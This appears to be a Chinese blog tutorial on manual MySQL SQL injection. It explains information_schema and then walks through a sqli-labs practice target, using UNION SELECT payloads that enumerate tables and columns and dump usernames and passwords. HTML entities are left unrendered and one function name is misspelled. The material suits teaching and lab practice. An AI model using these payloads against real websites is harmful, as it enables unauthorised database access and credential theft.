mysql报错手工注入_mysql手工注入之information_schema数据库详解

一、作为一个半道出家的萌新&＃xff0c;深知在

二、MySQL

知己知彼,百战不殆&＃xff0c;要想玩好SQL注入必须了解

1、库(database)&＃xff1a;MySQL数据库可以创建多个数据库&＃xff0c;如果把MySQL数据库比作我们中国&＃xff0c;那么每个图书馆都可以理解为一个库&＃xff0c;比如山大图书馆就是一个数据库&＃xff0c;那么山大图书馆就是这个库的库名&＃xff0c;如下图&＃xff1b;

图书馆&＃xff1a;

而在数据库中它是这样

2、表(table)&＃xff1a;表可以理解为存在于库中的二级目录&＃xff0c;接上例子&＃xff1a;类似于图书馆里的的书架&＃xff0c;一个书架就是一个表&＃xff0c;书架上贴的分类标签就是表名。

书架&＃xff1a;

而在数据库中是这样的&＃xff1a;

3、列(column)&＃xff1a;列是存在于表中的目录&＃xff0c;一个表中存在一个或多个列&＃xff0c;继续接上例子&＃xff0c;假设表是书架&＃xff0c;那么列可以理解为书架中的格子&＃xff0c;格子上又贴着细分的标签&＃xff0c;那么标签就是列名。

书架上的标签&＃xff1a;

在数据库中他是这样的&＃xff1a;

4、值/字段内容(value)&＃xff1a;值是存在于列中的数据&＃xff0c;还是上面的例子&＃xff0c;那么值就好理解了&＃xff0c;那就是书了&＃xff0c;这里不再配图。

为了更直观这里用PHPstudy里的数据库web管理页面展示&＃xff0c;它在数据库中是下图这样的&＃xff1a;

5、information_schema库介绍

infomation_schema数据库是Mysql下的一个存放其他数据库所有内容的信息数据库&＃xff0c;它有多个表&＃xff0c;通常所有的查询都要经过这个库查询&＃xff0c;这里只对个别相关的表做介绍。

Schema表&＃xff1a;

schema表有五个列&＃xff0c;其中schema_name是用来存放数据库库名的列。

tables表:

tables表用来存储所有数据库里的表名等信息,其中table_schema列用来存放所有数据库的库名,table_name用来存放MySQL数据库中的所有表名。

columns表&＃xff1a;

columns表用来存放数据库里的所有字段信息其中table_schema列用来存放数据库库名&＃xff0c;table_name列用来存放所有数据库里的所有表名&＃xff0c;column_name列用来存放所有的字段/内容(值)。

三、手工注入简介

了解了数据库结构了&＃xff0c;下面这里进行以下简单的复现&＃xff0c;这里使用的环境是phpstudy&＃xff0b;sqli-lab

1.单引号报错

2.and 1&＃61;1 判断&＃xff0c;返回正常

3.and 1&＃61;2 &＃xff0c;返回错误

4.判断出注入时&＃xff0c;首先利用order by子句(默认升序)结合折中法&＃xff0c;爆出当前列数&＃xff0c;猜到4时报错&＃xff0c;猜到3时正常&＃xff0c;说明列数为3。

5.爆出的长度为3&＃xff0c;参数值想办法让其报错(可以加负号等)&＃xff0c;然后进行联合查询&＃xff1f;id&＃61;-1 union select 1,2,3  爆出位置2和3。

6.爆出2&＃xff0c;3的位置后&＃xff0c;尝试用内置函数读取库名等信息&＃xff0c;这里补充下常见的内置函数。

version()--mysql版本

user()--数据库用户

database()--数据库名

&＃64;datadir--数据库路径

&＃64;&＃64;versioncompileos--操作系统

继续接上&＃xff0c;这里用在2&＃xff0c;3的位置上查询user和库名&＃xff0c;?id&＃61;-1 union select

1,user(),dabatase() ,爆出了账户、登陆方式和数据库名。

7.接下来爆表名&＃xff0c;这就用到了上面的information_schema这个库&＃xff0c;在2或者3的位置构造查询语句&＃xff0c;细分四个部分&＃xff1a;

(1)用点连接库下存放表名的tables表

(2)然后用where来精确查询存放在table_schema中的库名

(3)用limit函数来进行遍历

(4)用-- 注释防止报错

最终payload为&＃xff1a;union select 1,2,table_name from information_schema.tables where table_schema&＃61;’security’ limit 1,1 --&＃xff0b;

爆出了users表

8.爆出表名后&＃xff0c;接下来爆想要的列名&＃xff0c;思路如上&＃xff0c;遍历出想要的字段&＃xff0c;username和password。

最终payload为&＃xff1a;union select 1,2,column_name from information_schema.columns where table_schema&＃61;’security’and table_name&＃61;’users’ limit 1,1 --&＃xff0b;

修改limit函数遍历第二个想要的列名 union select 1,2,column_name from information_schema.columns where table_schema&＃61;’security’and table_name&＃61;’users’ limit 2,1 --&＃xff0b;

9.最后进行常规联合查询即可 payload: union select 1,username,password from users limit 1,1 --&＃xff0b;

Ps:不一定需要limit() 还有许多函数&＃xff0c;其他自行百度&＃xff0c;如有错误请指教&＃xff0c;谢谢。